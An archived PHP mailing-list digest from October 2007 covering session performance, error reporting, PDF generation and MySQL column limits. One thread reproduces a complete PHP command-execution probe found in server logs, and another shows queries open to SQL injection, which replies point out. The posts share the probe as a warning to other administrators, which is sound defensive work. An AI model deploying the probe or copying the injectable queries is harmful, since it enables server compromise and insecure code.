OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
php-general Digest 5 Oct 2007 15:25:53 -0000 Issue 5056

php-general-digest-helplists.php.net
Date: Fri Oct 05 2007 - 10:25:53 CDT


php-general Digest 5 Oct 2007 15:25:53 -0000 Issue 5056

Topics (messages 262781 through 262813):

Re: session_start is slow occasionally
        262781 by: Chris

Re: A two flavored post
        262782 by: Robert Cummings
        262783 by: Nathan Nobbe
        262784 by: heavyccasey.gmail.com

error messages
        262785 by: tbt
        262786 by: Paul Scott
        262788 by: Larry Garfield
        262789 by: tbt
        262790 by: Paul Scott
        262792 by: Ford, Mike
        262793 by: tbt
        262794 by: Aleksandar Vojnovic
        262795 by: Aleksandar Vojnovic

evil script in server logs (Heads Up)
        262787 by: Paul Scott
        262806 by: Ashley M. Kirchner
        262807 by: Paul Scott
        262811 by: Daniel Brown
        262813 by: Ashley M. Kirchner

Re: Generating PDF files (XSLT, ps, XSL-FO, FOP, etc)
        262791 by: Per Jessen
        262810 by: Larry Garfield

php on irc
        262796 by: Slith
        262797 by: Sudheer Satyanarayana

Empty Array?
        262798 by: Dan Shirah
        262799 by: Aleksandar Vojnovic
        262800 by: Dan Shirah
        262804 by: M. Sokolewicz
        262812 by: Aleksandar Vojnovic

Re: [SOAP] potential fix for bug 42637
        262801 by: Brian A. Seklecki

Re: Super bizarre changing variable!!
        262802 by: Brian Dunning
        262803 by: Richard Davey
        262805 by: Brian Dunning
        262808 by: Colin Guthrie
        262809 by: Richard Davey

Administrivia:

To subscribe to the digest, e-mail:
        php-general-digest-subscribelists.php.net

To unsubscribe from the digest, e-mail:
        php-general-digest-unsubscribelists.php.net

To post to the list, e-mail:
        php-generallists.php.net

----------------------------------------------------------------------

attached mail follows:


al jo wrote:
> Hi i have a site that is relatively high loaded (~200000 reloads/sec) and i am trying to optimize it.
> So i have started timing sections of the php scripts to find out which is the slowest so i optimize it first. I write the times to a database( timings are done on the live server). So now when a user reloads the page (timings are set on only one of the pages) i write to the database how long it took and how long different sections take. That way i noticed thar occasionally that page takes extremely long to generate (there are occasions of > 300sec), but generally it takes between 0.05 and 0.2 sec to generate. I started moving the sections to determine where the problem lies and it turned out that these three lines take that long from time to time:
> ini_set("session.gc_maxlifetime", "2400");
> session_name('xxxxx');
> session_start();
>
> I measured each of them and seems that session_start is the problem(had a few ~11 sec loads, but not something this big yet, of which ~10.5 is taking session_start)
> Does anyone know what is going on? Sessions are stored in /tmp/sessions/ which is 100MB ram drive and at the moment when this occurs it was ~68% used with ~12000 files in it.

My suggestion is check the php source for what session_start does. Maybe
it scans the directory to make sure it's going to generate a unique id
and even though it's on a ram drive it's taking a while because of the
number of files already there.

That's just a completely wild guess though ;)

--
Postgresql & php tutorials
http://www.designmagick.com/

attached mail follows:


On Thu, 2007-10-04 at 22:33 -0400, tedd wrote:
> Hi gang:
>
> I asked this question on the javascript list, but for some reason
> it's taking forever to post there. So, I figured that I would ask
> here as well.
>
> I'm currently sending data (the value of s) to another script via the
> html statement:
>
> <a href="img.php?s=<?php echo($value);?>">Click here</a>
>
> However, I need to add another variable, namely a javascript
> variable, to the GET string.
>
> How can I send both a php and a javascript variable together at the same time?

Use an onclick="" event handler.

Cheers,
Rob.
--
...........................................................
SwarmBuy.com - http://www.swarmbuy.com

    Leveraging the buying power of the masses!
...........................................................

attached mail follows:


On 10/4/07, tedd <teddsperling.com> wrote:
>
> Hi gang:
>
> I asked this question on the javascript list, but for some reason
> it's taking forever to post there. So, I figured that I would ask
> here as well.
>
> I'm currently sending data (the value of s) to another script via the
> html statement:
>
> <a href="img.php?s=<?php echo($value);?>">Click here</a>
>
> However, I need to add another variable, namely a javascript
> variable, to the GET string.
>
> How can I send both a php and a javascript variable together at the same
> time?

the question is when is the variable you want to append available to the
javascript.
as soon as you get the variable in the javascript the next thing you can do
is append
it to the value of the href attribute of the <a> tag.

<html>
    <head>
        <script type="text/javascript">
            window.onload = function() {
                var someLinkHref = document.getElementById('someLink').href;
                someLinkHref += "&anotherVar=8";
                alert(someLinkHref);
            }
        </script>
    </head>
    <body>
        <a id="someLink" href="http://somesite.com?a=5">
            click here
        </a>
    </body>
</html>

if you want to use the onclick event handler as rob suggested, you could
stash the variable in the Window
global object, then reference it in the implementation of the onclick
function (though i still have mixed feelings
about that approach [the Window object part that is]).

-nathan

-nathan

attached mail follows:


A simple example would be

<a href="img.php?s=<?php echo($value);?>" onclick="this.href +=
'&othervalue=x';">Click here</a>

On 10/4/07, Robert Cummings <robertinterjinn.com> wrote:
> On Thu, 2007-10-04 at 22:33 -0400, tedd wrote:
> > Hi gang:
> >
> > I asked this question on the javascript list, but for some reason
> > it's taking forever to post there. So, I figured that I would ask
> > here as well.
> >
> > I'm currently sending data (the value of s) to another script via the
> > html statement:
> >
> > <a href="img.php?s=<?php echo($value);?>">Click here</a>
> >
> > However, I need to add another variable, namely a javascript
> > variable, to the GET string.
> >
> > How can I send both a php and a javascript variable together at the same time?
>
> Use an onclick="" event handler.
>
> Cheers,
> Rob.
> --
> ...........................................................
> SwarmBuy.com - http://www.swarmbuy.com
>
> Leveraging the buying power of the masses!
> ...........................................................
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>

attached mail follows:


Hi

I'm a newbie to php and i would like to know a way of viewing runtime errors
on the browser. Currently when an error occurs nothing is displayed on the
browser. Is there any way of viewing all error messages on the browser
itself.

Thanks
--
View this message in context: http://www.nabble.com/error-messages-tf4573258.html#a13053817
Sent from the PHP - General mailing list archive at Nabble.com.

attached mail follows:


On Thu, 2007-10-04 at 22:38 -0700, tbt wrote:
> I'm a newbie to php and i would like to know a way of viewing runtime errors
> on the browser. Currently when an error occurs nothing is displayed on the
> browser. Is there any way of viewing all error messages on the browser
> itself.
>

You can up the error_reporting level in your php.ini, or you can simply
put the following line at the top of your script:

ini_set("error_reporting", "E_ALL");

or for an even stricter setting:

ini_set("error_reporting", "E_STRICT");

--Paul

All Email originating from UWC is covered by disclaimer http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm

attached mail follows:


On Friday 05 October 2007, Paul Scott wrote:
> On Thu, 2007-10-04 at 22:38 -0700, tbt wrote:
> > I'm a newbie to php and i would like to know a way of viewing runtime
> > errors on the browser. Currently when an error occurs nothing is
> > displayed on the browser. Is there any way of viewing all error messages
> > on the browser itself.
>
> You can up the error_reporting level in your php.ini, or you can simply
> put the following line at the top of your script:
>
> ini_set("error_reporting", "E_ALL");
>
> or for an even stricter setting:
>
> ini_set("error_reporting", "E_STRICT");
>
> --Paul

You will also need to set:

ini_set('display_errors', 'On');

Some web hosts set it Off by default for security reasons, but you probably
want it on for development and testing.

--
Larry Garfield AIM: LOLG42
larrygarfieldtech.com ICQ: 6817012

"If nature has made any one thing less susceptible than all others of
exclusive property, it is the action of the thinking power called an idea,
which an individual may exclusively possess as long as he keeps it to
himself; but the moment it is divulged, it forces itself into the possession
of every one, and the receiver cannot dispossess himself of it." -- Thomas
Jefferson

attached mail follows:


I added the following lines to the top of my script but still no error
messages show up on the browser.
When a php error occurs the entire page is still shown blank.

Larry Garfield wrote:
>
> On Friday 05 October 2007, Paul Scott wrote:
>> On Thu, 2007-10-04 at 22:38 -0700, tbt wrote:
>> > I'm a newbie to php and i would like to know a way of viewing runtime
>> > errors on the browser. Currently when an error occurs nothing is
>> > displayed on the browser. Is there any way of viewing all error
>> messages
>> > on the browser itself.
>>
>> You can up the error_reporting level in your php.ini, or you can simply
>> put the following line at the top of your script:
>>
>> ini_set("error_reporting", "E_ALL");
>>
>> or for an even stricter setting:
>>
>> ini_set("error_reporting", "E_STRICT");
>>
>> --Paul
>
> You will also need to set:
>
> ini_set('display_errors', 'On');
>
> Some web hosts set it Off by default for security reasons, but you
> probably
> want it on for development and testing.
>
> --
> Larry Garfield AIM: LOLG42
> larrygarfieldtech.com ICQ: 6817012
>
> "If nature has made any one thing less susceptible than all others of
> exclusive property, it is the action of the thinking power called an idea,
> which an individual may exclusively possess as long as he keeps it to
> himself; but the moment it is divulged, it forces itself into the
> possession
> of every one, and the receiver cannot dispossess himself of it." --
> Thomas
> Jefferson
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
>

--
View this message in context: http://www.nabble.com/error-messages-tf4573258.html#a13054779
Sent from the PHP - General mailing list archive at Nabble.com.

attached mail follows:


On Fri, 2007-10-05 at 00:32 -0700, tbt wrote:
> I added the following lines to the top of my script but still no error
> messages show up on the browser.
> When a php error occurs the entire page is still shown blank.
>

Is your script *supposed* to output something?

--Paul

All Email originating from UWC is covered by disclaimer http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm

attached mail follows:


> -----Original Message-----
> From: Paul Scott [mailto:pscottuwc.ac.za]
> Sent: 05 October 2007 06:44
>
> On Thu, 2007-10-04 at 22:38 -0700, tbt wrote:
> > I'm a newbie to php and i would like to know a way of
> viewing runtime errors
> > on the browser. Currently when an error occurs nothing is
> displayed on the
> > browser. Is there any way of viewing all error messages on
> the browser
> > itself.
> >
>
> You can up the error_reporting level in your php.ini, or you
> can simply
> put the following line at the top of your script:
>
> ini_set("error_reporting", "E_ALL");
>
> or for an even stricter setting:
>
> ini_set("error_reporting", "E_STRICT");

Er, no, actually that's much *less* strict, as it won't display any of the E_ALL errors; I think you meant:

   ini_set("error_reporting", E_ALL & E_STRICT);

Cheers!

Mike

---------------------------------------------------------------------
Mike Ford, Electronic Information Services Adviser,
JG125, The Headingley Library,
James Graham Building, Leeds Metropolitan University,
Headingley Campus, LEEDS, LS6 3QS, United Kingdom
Email: m.fordleedsmet.ac.uk
Tel: +44 113 812 4730 Fax: +44 113 812 3211

To view the terms under which this email is distributed, please go to http://disclaimer.leedsmet.ac.uk/email.htm

attached mail follows:


yes it is

pscott wrote:
>
>
> On Fri, 2007-10-05 at 00:32 -0700, tbt wrote:
>> I added the following lines to the top of my script but still no error
>> messages show up on the browser.
>> When a php error occurs the entire page is still shown blank.
>>
>
> Is your script *supposed* to output something?
>
> --Paul
>
>
> All Email originating from UWC is covered by disclaimer
> http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>

--
View this message in context: http://www.nabble.com/error-messages-tf4573258.html#a13056353
Sent from the PHP - General mailing list archive at Nabble.com.

attached mail follows:


try putting this on the top of your PHP page
<?php
error_reporting(E_ALL);
....

?>
tbt wrote:
> yes it is
>
>
>
> pscott wrote:
>
>> On Fri, 2007-10-05 at 00:32 -0700, tbt wrote:
>>
>>> I added the following lines to the top of my script but still no error
>>> messages show up on the browser.
>>> When a php error occurs the entire page is still shown blank.
>>>
>>>
>> Is your script *supposed* to output something?
>>
>> --Paul
>>
>>
>> All Email originating from UWC is covered by disclaimer
>> http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm
>>
>>
>> --
>> PHP General Mailing List (http://www.php.net/)
>> To unsubscribe, visit: http://www.php.net/unsub.php
>>
>>
>
>

attached mail follows:


Maybe display errors is set on off?

<?
ini_set('display_errors','1');
?>

Aleksander

tbt wrote:
> yes it is
>
>
>
> pscott wrote:
>
>> On Fri, 2007-10-05 at 00:32 -0700, tbt wrote:
>>
>>> I added the following lines to the top of my script but still no error
>>> messages show up on the browser.
>>> When a php error occurs the entire page is still shown blank.
>>>
>>>
>> Is your script *supposed* to output something?
>>
>> --Paul
>>
>>
>> All Email originating from UWC is covered by disclaimer
>> http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm
>>
>>
>> --
>> PHP General Mailing List (http://www.php.net/)
>> To unsubscribe, visit: http://www.php.net/unsub.php
>>
>>
>
>

attached mail follows:


I am taking a quick look through the access logs on our dev box, and
came across this little nasty that was trying to execute itself as a XSS
attack(?)

<?
$ker = php_uname();
$osx = PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>";
echo "<h2>SysOSx:$ker</h2></br>";
echo "<h2>SysOSx:$osx</h2></br>";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;
function ex($cfe)
{
        $res = '';
        if (!empty($cfe))
        {
                if(function_exists('exec'))
                {
                        exec($cfe,$res);
                        $res = join("\n",$res);
                }
                elseif(function_exists('shell_exec'))
                {
                        $res = shell_exec($cfe);
                }
                elseif(function_exists('system'))
                {
                        ob_start();
                        system($cfe);
                        $res = ob_get_contents();
                        ob_end_clean();
                }
                elseif(function_exists('passthru'))
                {
                        ob_start();
                        passthru($cfe);
                        $res = ob_get_contents();
                        ob_end_clean();
                }
                elseif(is_resource($f = popen($cfe,"r")))
                {
                        $res = "";
                        while(!feof($f)) { $res .= fread($f,1024); }
                        pclose($f);
                }
        }
        return $res;
}
?>

So far, it is coming from http://www.vesprokat.ru/n and http://www.goodasgold.com

Be aware and check that your files are not vulnerable, although they are only going to get your
users and groups info, as well as OS, you should all look out for this.

--Paul

All Email originating from UWC is covered by disclaimer http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm

attached mail follows:


Paul Scott wrote:
> I am taking a quick look through the access logs on our dev box, and
> came across this little nasty that was trying to execute itself as a XSS
> attack(?)
    Interestingly enough, MimeDefang/ClamAV quarantined your message
because of that script:

        Quarantine Messages:
        Message quarantined because of virus: PHP.Shell.

    Someone saw it somewhere and reported it...

attached mail follows:


On Fri, 2007-10-05 at 07:38 -0600, Ashley M. Kirchner wrote:
> Quarantine Messages:
> Message quarantined because of virus: PHP.Shell.
>
> Someone saw it somewhere and reported it...

Don't you love Free Software? ;)

--Paul

All Email originating from UWC is covered by disclaimer http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm

attached mail follows:


On 10/5/07, Paul Scott <pscottuwc.ac.za> wrote:
>
> On Fri, 2007-10-05 at 07:38 -0600, Ashley M. Kirchner wrote:
> > Quarantine Messages:
> > Message quarantined because of virus: PHP.Shell.
> >
> > Someone saw it somewhere and reported it...
>
> Don't you love Free Software? ;)
>
> --Paul
>
>
> All Email originating from UWC is covered by disclaimer http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>

    The biggest issue does still remain: if this is on your local
system, you need to figure out exactly how it got there in the first
place.

--
Daniel P. Brown
[office] (570-) 587-7080 Ext. 272
[mobile] (570-) 766-8107

Give a man a fish, he'll eat for a day. Then you'll find out he was
allergic and is hospitalized. See? No good deed goes unpunished....

attached mail follows:


Daniel Brown wrote:
> The biggest issue does still remain: if this is on your local
> system, you need to figure out exactly how it got there in the first
> place
    I thought the OP said he noticed it in his logs... I understood
that as someone cleverly trying to inject it somehow and it ended up in
the log files. But, without further information, I'm just as clueless...

--
W | It's not a bug - it's an undocumented feature.
  +--------------------------------------------------------------------
  Ashley M. Kirchner <mailto:ashleypcraft.com> . 303.442.6410 x130
  IT Director / SysAdmin / Websmith . 800.441.3873 x130
  Photo Craft Imaging . 3550 Arapahoe Ave. #6
  http://www.pcraft.com ..... . . . Boulder, CO 80303, U.S.A.

attached mail follows:


Yannick Warnier wrote:

> but you can't generate a PDF using XML and XSLT, although XSLT is, to
> my understanding, made to enable export in various formats from the
> same XML file.

XSLT is a style language, and you could quite possibly make it produce a
PDF.

> It seems that in this case (exporting from XML to PDF), you need to
> first convert the XML to a XSL-FO format (using XSLT) and then convert
> that XSL-FO format into PDF, and the only way to do that last step at
> the moment seems to be to use Apache's FOP project, which requires
> Java and a server-side component that you are unlikely to be
> authorized to install on a low-cost hosting server.

There is more than one way to skin a cat. I generate PDFs in batch
using an OpenOffice document template (which is XML anyway), merge that
with my XML data using xalanc, and then openoffice to create the PDF.

/Per Jessen, Z├╝rich

attached mail follows:


On Friday 05 October 2007, Per Jessen wrote:
> Yannick Warnier wrote:
> > but you can't generate a PDF using XML and XSLT, although XSLT is, to
> > my understanding, made to enable export in various formats from the
> > same XML file.
>
> XSLT is a style language, and you could quite possibly make it produce a
> PDF.

Not quite. You would use XSLT to generate XSL:FO output. You would then use
a tool like Apache FOP (or various others, free and not) to convert the
XSL:FO document into a PDF.

I've done this before, but it's been a while. :-)

--
Larry Garfield AIM: LOLG42
larrygarfieldtech.com ICQ: 6817012

"If nature has made any one thing less susceptible than all others of
exclusive property, it is the action of the thinking power called an idea,
which an individual may exclusively possess as long as he keeps it to
himself; but the moment it is divulged, it forces itself into the possession
of every one, and the receiver cannot dispossess himself of it." -- Thomas
Jefferson

attached mail follows:


i was just wondering if there is an irc channel for php?

attached mail follows:


Hi Slith,

#php on irc.freenode.net is a nice PHP channel

Slith wrote:
> i was just wondering if there is an irc channel for php?
>

--
With Warm Regards,
Sudheer. S
http://www.binaryvibes.co.in

attached mail follows:


Ah, what a lovely case of the Friday morning brain farts!

I have a query that selects some data from a table based on the current ID
selected.

If the query does not return any results, I want it to continue to another
query that will insert a record into the table.

Below is what I have...but it will not insert anything if the first query
does not find a match.

<?php
$request_id = $_GET['id'];
$current_user = substr($_SERVER['AUTH_USER'], 13);

$lock_query = "SELECT id, locked_by_user FROM locked_payments WHERE id =
'$request_id'";
$lock_result = mssql_query($lock_query) or die(mssql_get_last_message());

if (empty($lock_result)) {
 $set_lock = "INSERT into locked_payments (
     id,
     locked_by_user)
     VALUES
      ('$request_id',
     '$current_user')";
 mssql_query($set_lock) or die ("Insert failed: <br
/>".mssql_get_last_message());
 }
?>

Any ideas on what I'm doing wrong? My guess is that (empty($lock_result))
is probably not the correct way to check if an array is empty?

attached mail follows:


I think the $lock_result is just a resource #id you haven't fetched any data yet. True?

Aleksander

Dan Shirah wrote:
> Ah, what a lovely case of the Friday morning brain farts!
>
> I have a query that selects some data from a table based on the current ID
> selected.
>
> If the query does not return any results, I want it to continue to another
> query that will insert a record into the table.
>
> Below is what I have...but it will not insert anything if the first query
> does not find a match.
>
>
> <?php
> $request_id = $_GET['id'];
> $current_user = substr($_SERVER['AUTH_USER'], 13);
>
> $lock_query = "SELECT id, locked_by_user FROM locked_payments WHERE id =
> '$request_id'";
> $lock_result = mssql_query($lock_query) or die(mssql_get_last_message());
>
> if (empty($lock_result)) {
> $set_lock = "INSERT into locked_payments (
> id,
> locked_by_user)
> VALUES
> ('$request_id',
> '$current_user')";
> mssql_query($set_lock) or die ("Insert failed: <br
> />".mssql_get_last_message());
> }
> ?>
>
>
>
> Any ideas on what I'm doing wrong? My guess is that (empty($lock_result))
> is probably not the correct way to check if an array is empty?
>
>

attached mail follows:


Okay, gotcha!

I changed it to this and it works:

<?php
$request_id = $_GET['id'];
$current_user = substr($_SERVER['AUTH_USER'], 13);

$lock_query = "SELECT id, locked_by_user FROM locked_payments WHERE id =
'$request_id'";
$lock_result = mssql_query($lock_query) or die(mssql_get_last_message());
$lock_row = mssql_fetch_array($lock_result);
$lock_id = $lock_row['id'];
$lock_user = $lock_row['locked_by_user'];

if (empty($lock_row)) {
 $set_lock = "INSERT into locked_payments (
     id,
     locked_by_user)
     VALUES
      ('$request_id',
     '$current_user')";
 mssql_query($set_lock) or die ("Query failed: <br
/>".mssql_get_last_message());
 }
?>

Thanks! :)
On 10/5/07, Aleksandar Vojnovic <muadibconsoriana.com> wrote:
>
> I think the $lock_result is just a resource #id you haven't fetched any
> data yet. True?
>
> Aleksander
>
> Dan Shirah wrote:
> > Ah, what a lovely case of the Friday morning brain farts!
> >
> > I have a query that selects some data from a table based on the current
> ID
> > selected.
> >
> > If the query does not return any results, I want it to continue to
> another
> > query that will insert a record into the table.
> >
> > Below is what I have...but it will not insert anything if the first
> query
> > does not find a match.
> >
> >
> > <?php
> > $request_id = $_GET['id'];
> > $current_user = substr($_SERVER['AUTH_USER'], 13);
> >
> > $lock_query = "SELECT id, locked_by_user FROM locked_payments WHERE id =
> > '$request_id'";
> > $lock_result = mssql_query($lock_query) or
> die(mssql_get_last_message());
> >
> > if (empty($lock_result)) {
> > $set_lock = "INSERT into locked_payments (
> > id,
> > locked_by_user)
> > VALUES
> > ('$request_id',
> > '$current_user')";
> > mssql_query($set_lock) or die ("Insert failed: <br
> > />".mssql_get_last_message());
> > }
> > ?>
> >
> >
> >
> > Any ideas on what I'm doing wrong? My guess is that
> (empty($lock_result))
> > is probably not the correct way to check if an array is empty?
> >
> >
>
>

attached mail follows:


I'll just put my comments inline for you...

Dan Shirah wrote:
> Okay, gotcha!
>
> I changed it to this and it works:
>
>
> <?php
> $request_id = $_GET['id'];
> $current_user = substr($_SERVER['AUTH_USER'], 13);
You can't trust this info.
>
> $lock_query = "SELECT id, locked_by_user FROM locked_payments WHERE id =
> '$request_id'";
WARNING :: SQL INJECTION :: WARNING
> $lock_result = mssql_query($lock_query) or die(mssql_get_last_message());
> $lock_row = mssql_fetch_array($lock_result);
> $lock_id = $lock_row['id'];
> $lock_user = $lock_row['locked_by_user'];
You don't know if these 2 exist, so you'll get E_NOTICEs when you get 0
rows in your result
>
> if (empty($lock_row)) {
And now you check if it actually HAS data, why didn't you do this 2
lines earlier ?
> $set_lock = "INSERT into locked_payments (
> id,
> locked_by_user)
> VALUES
> ('$request_id',
> '$current_user')";
WARNING :: SQL INJECTION :: WARNING
> mssql_query($set_lock) or die ("Query failed: <br
> />".mssql_get_last_message());
> }
> ?>
>
> Thanks! :)
you're welcome.

- Tul

> On 10/5/07, Aleksandar Vojnovic <muadibconsoriana.com> wrote:
>> I think the $lock_result is just a resource #id you haven't fetched any
>> data yet. True?
>>
>> Aleksander
>>
>> Dan Shirah wrote:
>>> Ah, what a lovely case of the Friday morning brain farts!
>>>
>>> I have a query that selects some data from a table based on the current
>> ID
>>> selected.
>>>
>>> If the query does not return any results, I want it to continue to
>> another
>>> query that will insert a record into the table.
>>>
>>> Below is what I have...but it will not insert anything if the first
>> query
>>> does not find a match.
>>>
>>>
>>> <?php
>>> $request_id = $_GET['id'];
>>> $current_user = substr($_SERVER['AUTH_USER'], 13);
>>>
>>> $lock_query = "SELECT id, locked_by_user FROM locked_payments WHERE id =
>>> '$request_id'";
>>> $lock_result = mssql_query($lock_query) or
>> die(mssql_get_last_message());
>>> if (empty($lock_result)) {
>>> $set_lock = "INSERT into locked_payments (
>>> id,
>>> locked_by_user)
>>> VALUES
>>> ('$request_id',
>>> '$current_user')";
>>> mssql_query($set_lock) or die ("Insert failed: <br
>>> />".mssql_get_last_message());
>>> }
>>> ?>
>>>
>>>
>>>
>>> Any ideas on what I'm doing wrong? My guess is that
>> (empty($lock_result))
>>> is probably not the correct way to check if an array is empty?
>>>
>>>
>>
>

attached mail follows:


$request_id = $_GET['id']; <--- I suppose this would be an int. True? If
so then add:

<?php
$request_id = intval($_GET['id']);
?>

Aleksandar

marek wrote:
> Even better:
>
> <?php
> $request_id = $_GET['id'];
> $current_user = substr($_SERVER['AUTH_USER'], 13);
>
> $lock_query = "SELECT id, locked_by_user FROM locked_payments WHERE id =
> '$request_id'";
> $lock_result = mssql_query($lock_query) or die(mssql_get_last_message());
> $lock_row = mssql_fetch_array($lock_result);
>
> if (empty($lock_row)) {
> $lock_id = $lock_row['id'];
> $lock_user = $lock_row['locked_by_user'];
> $set_lock = "INSERT into locked_payments (
> id,
> locked_by_user)
> VALUES
> ('$request_id',
> '$current_user')";
> mssql_query($set_lock) or die ("Query failed: <br
> />".mssql_get_last_message());
> }
> ?>
>
>
>
> Dan Shirah wrote:
>> Okay, gotcha!
>>
>> I changed it to this and it works:
>>
>>
>> <?php
>> $request_id = $_GET['id'];
>> $current_user = substr($_SERVER['AUTH_USER'], 13);
>>
>> $lock_query = "SELECT id, locked_by_user FROM locked_payments WHERE id =
>> '$request_id'";
>> $lock_result = mssql_query($lock_query) or
>> die(mssql_get_last_message());
>> $lock_row = mssql_fetch_array($lock_result);
>> $lock_id = $lock_row['id'];
>> $lock_user = $lock_row['locked_by_user'];
>>
>> if (empty($lock_row)) {
>> $set_lock = "INSERT into locked_payments (
>> id,
>> locked_by_user)
>> VALUES
>> ('$request_id',
>> '$current_user')";
>> mssql_query($set_lock) or die ("Query failed: <br
>> />".mssql_get_last_message());
>> }
>> ?>
>>
>> Thanks! :)
>> On 10/5/07, Aleksandar Vojnovic <muadibconsoriana.com> wrote:
>>
>>> I think the $lock_result is just a resource #id you haven't fetched any
>>> data yet. True?
>>>
>>> Aleksander
>>>
>>> Dan Shirah wrote:
>>>
>>>> Ah, what a lovely case of the Friday morning brain farts!
>>>>
>>>> I have a query that selects some data from a table based on the
>>>> current
>>>>
>>> ID
>>>
>>>> selected.
>>>>
>>>> If the query does not return any results, I want it to continue to
>>>>
>>> another
>>>
>>>> query that will insert a record into the table.
>>>>
>>>> Below is what I have...but it will not insert anything if the first
>>>>
>>> query
>>>
>>>> does not find a match.
>>>>
>>>>
>>>> <?php
>>>> $request_id = $_GET['id'];
>>>> $current_user = substr($_SERVER['AUTH_USER'], 13);
>>>>
>>>> $lock_query = "SELECT id, locked_by_user FROM locked_payments WHERE
>>>> id =
>>>> '$request_id'";
>>>> $lock_result = mssql_query($lock_query) or
>>>>
>>> die(mssql_get_last_message());
>>>
>>>> if (empty($lock_result)) {
>>>> $set_lock = "INSERT into locked_payments (
>>>> id,
>>>> locked_by_user)
>>>> VALUES
>>>> ('$request_id',
>>>> '$current_user')";
>>>> mssql_query($set_lock) or die ("Insert failed: <br
>>>> />".mssql_get_last_message());
>>>> }
>>>> ?>
>>>>
>>>>
>>>>
>>>> Any ideas on what I'm doing wrong? My guess is that
>>>>
>>> (empty($lock_result))
>>>
>>>> is probably not the correct way to check if an array is empty?
>>>>
>>>>
>>>>
>>>
>>
>>
>
>

attached mail follows:


On Mon, 2007-10-01 at 11:58 -0400, Bill Moran wrote:
> I posted this to internals on Friday and haven't heard anything.
>

Hi Bill!

This patch is *great*. In fact, I'll take two! It's a steal! I was
running into the same problem and your patch is a life saver!

Free beer for Bill in the future!

Hopefully PHP 5.2.5 will be released soon and will include this fix!?

One would think that PHP would have automated regression testing running
on a build farm somewhere that would find a bug like this!

Did you see the CVS changelog between 1.106 and 1.107? Its flagged as
as "MFB". What's that mean, then? "Merge from branch"? "More
functionality breakage?"

I personally prefer the NetBSD CVS commit message policy:

- Explain in detail what your CVS commit changes
- Why you did it
- What it could break
- What trouble tickets/problem reports are related to
- What release engineering branches are affected?
- Who peer-reviewed your change and approved your commit.

Otherwise they'll just cane you.

~BAS

> I believe the fix I posted to this bug fixes it. At least, changing
> line 921 makes the problem go away in our testing environment.
>
> Anyone available to have a look at this?
>
> http://bugs.php.net/bug.php?id=42637
>
> --
> Bill Moran
> Collaborative Fusion Inc.
> http://people.collaborativefusion.com/~wmoran/
>
> wmorancollaborativefusion.com
> Phone: 412-422-3463x4023

attached mail follows:


This is indeed the complete code, I did not cut anything out for
brevity, which is why this appears to be so impossible.

eAccelerator is activated, could something be corrupt? Could a
corrupt index cause this?

In table1, `referer` is int(12).
In table2, `data` is text
In table2, `friend_id` is mediumint(9) - which I see is a problem in
some cases, $referer can (rarely) be 10 digits long, so I just
changed it to int(12)

When $referer is being set it's probably a string type, but the
contents are ALWAYS a valid integer.

Any ideas?????

On Oct 4, 2007, at 10:55 AM, Richard Davey wrote:

> Hi Brian,
>
> Thursday, October 4, 2007, 4:50:09 PM, you wrote:
>
>> I'm running the following code:
>
>> $query3 = "DELETE FROM table1 WHERE referer=$referer ORDER BY
>> creation LIMIT $numtodelete";
>> $result3 = mysql_query($query3);
>> $string = "$total found, $n kept, $numtodelete extras removed
>> ($query3)";
>> $x = mysql_query("insert into table2 (friend_id,data) values
>> ($referer,'$string')");
>
>> I created the table2 log file just so I could see what the hell is
>> going on. Here is a typical entry in table2:
>
>> FRIEND_ID = 8388607
>
>> DATA = 908 found, 100 kept, 808 extras removed (DELETE FROM table1
>> WHERE referer=69833818 ORDER BY creation LIMIT 808)
>
>> Notice that the value in FRIEND_ID, which was set with $referer, is
>> DIFFERENT than the value of $referer shown in DATA! How the flying
>> f*&^%k is this possible??? I've been tearing my hair out for 3 days
>> over this.
>
>> Almost all records show 8388607 in that FRIEND_ID field. Once in a
>> blue moon, a different value is shown, which does match the value in
>> DATA. So it's displaying this erroneous behavior 95% of the time but
>> not always.
>
> What data type do the referer / friend_id columns have in MySQL? int?
> tinyint? etc
>
> Also show all of your code - there is no way that the value changes
> between lines 1 and 4 in the code above, which means you've missed
> something out (probably for post brevitys sake)
>
> Cheers,
>
> Rich
> --
> Zend Certified Engineer
> http://www.corephp.co.uk
>
> "Never trust a computer you can't throw out of a window"
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>

attached mail follows:


Hi Brian,

Friday, October 5, 2007, 1:28:35 PM, you wrote:

> This is indeed the complete code, I did not cut anything out for
> brevity, which is why this appears to be so impossible.

> eAccelerator is activated, could something be corrupt? Could a
> corrupt index cause this?

> In table1, `referer` is int(12).
> In table2, `data` is text
> In table2, `friend_id` is mediumint(9) - which I see is a problem in
> some cases, $referer can (rarely) be 10 digits long, so I just
> changed it to int(12)

The number in () after the int doesn't apply to the number of digits
it can contain. A mediumint field will never hold a value above
16,777,215 assuming you are using an unsigned field, otherwise the
limit is a mere 8,388,607 - neither of which are big enough to hold the
value you're trying to put into it (69,833,818)

An unsigned int field MAY be enough, the limit being 4,294,967,295 -
but if you've got a 10 digit value LARGER than this, it'll still fail.
Meaning you either need to use a bigint field, or rethink how you are
storing these values in the first place.

Cheers,

Rich
--
Zend Certified Engineer
http://www.corephp.co.uk

"Never trust a computer you can't throw out of a window"

attached mail follows:


I definitely misunderstood what you guys are saying about the length.
